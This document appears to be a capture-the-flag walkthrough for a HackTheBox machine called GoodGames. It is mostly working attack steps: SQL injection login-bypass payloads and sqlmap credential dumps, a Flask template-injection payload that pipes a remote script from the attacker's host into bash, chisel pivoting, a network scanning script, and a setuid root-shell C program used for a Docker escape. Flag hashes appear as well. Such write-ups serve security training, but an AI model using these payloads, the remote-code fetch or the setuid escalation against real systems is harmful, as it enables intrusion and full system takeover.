Information Gathering
IP Address | Opening Ports |
---|---|
10.10.11.130 | TCP:80 |
$ sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.130
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb
SQL Injection (SQLi)
# echo '10.10.11.130 goodgames.htb' >> /etc/hosts
$ dirsearch -u 'http://goodgames.htb'
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb" -ac
email=1%40gmail.com'--+&password=123
email=1%40gmail.com'%20OR%20'1'='1'--+&password=123
$ sqlmap -r sqli -p email --batch
$ sqlmap -r sqli -p email --batch -D main -T user --dump
email:[email protected]
username:admin
password:superadministrator
# echo '10.10.11.130 internal-administration.goodgames.htb' >> /etc/hosts
Flask SSTI (Server-Side Template Injection)
http://internal-administration.goodgames.htb/login
POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjmOAjEQQNG7OJ6gNttlLtOyaxFopBmpGyLE3WlE-F_0n2XLPY5rudz3R_yU7eblUmbNTKJOMTv2xlEnLvZRZa6cyFlXApt0B8yTWRbWcKjWxBynA7euMwcNqoxhGCBJQ62zDFouHEMJZWlVc9eVlg20Z-uGiOUceRyxf28-acee2_3_N_5OSIfAIS1aR1OxaO5jgShFCrBKJVTXVl5vIF4_KQ.Z5IPJg.xnuJSS0C6PcZvOJeMd6iV8AclZE
Upgrade-Insecure-Requests: 1
name={{9*9}}
name={{config.__class__.__init__.__globals__['os'].popen('curl%20http://10.10.16.16/rev|bash').read()}}
User.txt
388118f20c90df4d38744d9ac624dd43
Privilege Escalation : Docker Escape
Server:
$ chisel server -p 8000 --reverse
Client:
# ./chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks
Server:
$ vim 10.10.11.130.conf
Client:
# arp -a
https://raw.githubusercontent.com/S12cybersecurity/Pivoting_Enum/refs/heads/main/pivoting.sh
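#!/bin/bash
# Pivoting enumeration helper.  Prints basic facts about the current machine
# (local addresses, which common utilities are on PATH), then ping-sweeps each
# /24 prefix given on the command line and TCP-connect-scans ports 1-10001 on
# every address that answered.
#
# Usage:   ./pivoting.sh 192.168.0 [10.0.0 ...]
# Outputs: progress to stdout; every responding address is appended to
#          ./hosts.txt in the current directory.
# Returns: 1 when no network prefix is given, 0 otherwise.
#
# Deliberately no `set -e`/`pipefail`: a grep with no match and a probe that
# gets no answer are expected non-zero statuses here, not errors.

readonly RED=$'\e[31m'
readonly GREEN=$'\e[32m'
readonly YELLOW=$'\e[33m'
readonly ENDCOLOR=$'\e[0m'

machine_name=$(hostname)
printf '%s[+] Basic Information on %s machine%s\n' "$GREEN" "$machine_name" "$ENDCOLOR"

printf "\n%sList of Machine Local IP's:%s\n" "$YELLOW" "$ENDCOLOR"
# The original awk printed "$(NF+4), $NF" and trimmed the leading space, which
# is simply the last field of each ifconfig line; heuristic, kept as is.
# -F makes the dot literal, so e.g. "1720..." no longer passes the 172. filter.
last_fields=$(ifconfig | awk '{print $NF}')
grep -F -- '172.' <<<"$last_fields"
grep -F -- '192.' <<<"$last_fields"
grep -F -- '10.' <<<"$last_fields" | grep -v -F -- '0x10<host>'

printf '\n%sUtilities:%s\n' "$YELLOW" "$ENDCOLOR"
# `command -v` prints the resolved path when the tool is on PATH and nothing
# otherwise (same visible output as the original `which` calls).
for tool in aws netcat nc.traditional curl ping gcc g++ make gdb base64 socat \
  python python2 python3 perl php ruby xterm sudo wget nc nmap fping; do
  command -v "$tool"
done

printf '\n\n%s[+] Network Recon\n%s\n' "$GREEN" "$ENDCOLOR"

if (( $# == 0 )) || [[ -z $1 ]]; then
  printf '%s[*] Syntax: <NETWORK/S TO SCAN> Format: 192.168.0 %s\n' "$RED" "$ENDCOLOR" >&2
  exit 1
fi

# Every positional argument is one /24 prefix.  The original matched $# with
# a regex (`$# =~ 1`), so 10+ arguments fell into the one-network branch and
# 5-9 arguments scanned nothing; a plain array handles any count.
hosts=("$@")
networks=$(printf '%s, ' "${hosts[@]}")
printf '%sList of Networks: %s%s\n' "$GREEN" "$ENDCOLOR" "${networks%, }"

active=()
for net in "${hosts[@]}"; do
  printf '\n%s[*] Enumerating Network: %s%s\n\n' "$YELLOW" "$net" "$ENDCOLOR"
  for (( i = 1; i <= 254; i++ )); do
    ip="$net.$i"
    # One bounded probe; its output is reused for the TTL guess instead of
    # pinging the host a second time (the second ping had no timeout).
    if reply=$(timeout 0.5 ping -c 1 "$ip" 2>/dev/null); then
      active+=("$ip")
      printf '%s\n' "$ip" >> hosts.txt
      # Rough OS guess from the reply TTL: ~64 Linux, ~128 Windows, allowing a
      # couple of hops off the default.
      os=UNDETECTED
      if [[ $reply =~ ttl=([0-9]+) ]]; then
        ttl=${BASH_REMATCH[1]}
        if (( ttl >= 62 && ttl <= 64 )); then
          os=Linux
        elif (( ttl >= 126 && ttl <= 128 )); then
          os=Windows
        fi
      fi
      printf '[+] HOST %s ACTIVE [OS=%s]\n' "$ip" "$os"
    fi
  done
done

for ip in "${active[@]}"; do
  printf '\n%s[*] Scanning Ports on: %s%s\n\n' "$YELLOW" "$ip" "$ENDCOLOR"
  for (( port = 1; port <= 10001; port++ )); do
    # The connect attempt needs a child bash so `timeout` can bound it; host
    # and port go in as $0/$1 rather than being spliced into the -c string.
    { timeout 1 bash -c 'echo "" > "/dev/tcp/$0/$1"' "$ip" "$port" 2>/dev/null \
        && printf '\t[+] PORT %s:%s OPEN\n' "$ip" "$port"; } &
  done
  wait
done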
# ./host_discovery.sh 172.19.0
Server:
$ sudo proxychains -f 10.10.11.130.conf ssh [email protected]
Docker 用户在 augustus 目录中创建 test 文件，test 的所有者是 root
#include <stdio.h>
#include <stdlib.h>
/* Entry point: asks for uid 0 and then hands control to an interactive
 * /bin/bash via system(3).  Intended to be built and run as a set-uid root
 * binary (the page's chmod u+s step).  setuid() is declared in <unistd.h>,
 * which this listing does not include, so the call relies on an implicit
 * declaration; its return value is not checked, so a failed setuid() still
 * spawns a shell, just with the caller's own uid. */
int main() {
setuid(0);
system("/bin/bash");
}
# wget http://10.10.16.16/suid.c
# gcc suid.c -o suid
# chmod u+s suid
augustus@GoodGames:~$ ./suid
Root.txt
a42c76fe28f8a2556fa7e8794f133c15